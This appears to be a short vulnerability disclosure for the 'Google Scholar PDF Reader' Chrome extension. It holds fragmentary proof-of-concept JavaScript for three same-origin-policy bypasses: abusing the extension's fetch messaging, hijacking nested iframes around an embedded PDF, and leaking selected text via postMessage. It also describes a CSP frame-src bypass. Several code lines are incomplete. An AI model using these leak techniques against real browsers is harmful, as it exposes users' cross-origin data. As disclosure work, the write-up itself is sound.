
Google Scholar PDF Reader is apparently not an official Google app so was not awarded :(
Chrome Webstore: https://chromewebstore.google.com/detail/google-scholar-pdf-reader/dahenjhkoodjbpjheillcadbppiidmhp

Leak 1 (With compromised renderer)

// In the context of a content script on any website.
// Leaked data must be JSON.

let x = chrome.runtime.connect();
  type: 'fetch',
  method: 'GET',
  url: 'https://www.google.com/something.json',
  id: 1

Leak 2 (Without compromised renderer)

// Embed victim PDF from attacker page.
let f = document.createElement('iframe');
f.width = 1000;
f.height = 1000;
f.src =

// Navigate nested, nested frame to attacker controlled page with null origin.
// I think this also creates a race condition version
f.contentWindow[0][0].location =

// On that attacker page, Make sure the target page to leak is the same-origin as the pdf https://services.google.com in this case.
onmessage = async (e) => {
  let reader = e.data.body.pipeThrough(new TextDecoderStream()).getReader();
  let result = await reader.read();
  {type: 'fetch', url: 'https://services.google.com/example'},

Leak 3 (Without compromised renderer)

let f = document.createElement('iframe');
f.width = 1000;
f.height = 1000;
f.src =

Selected text gets leaked cross-origin.

onmessage = console.log;
f.contentWindow[0].postMessage({type: 'getSelectedText'}, '*');

Attack scenario

An attacker controlled website can bypass SOP if one of the following is met:

frame-src ‘self’ bypass

Because of an about:blank edge case it’s possible to navigate a nested, nested 3rd party iframe to it and bypass the child’s CSP.
This has resulted in leaking data due to the victim sending sensitive information to a iframe using the * scope that can be hijacked via good navigation timings even with the CSP.
A GitHub issue was opened about this https://github.com/w3c/webappsec-csp/issues/662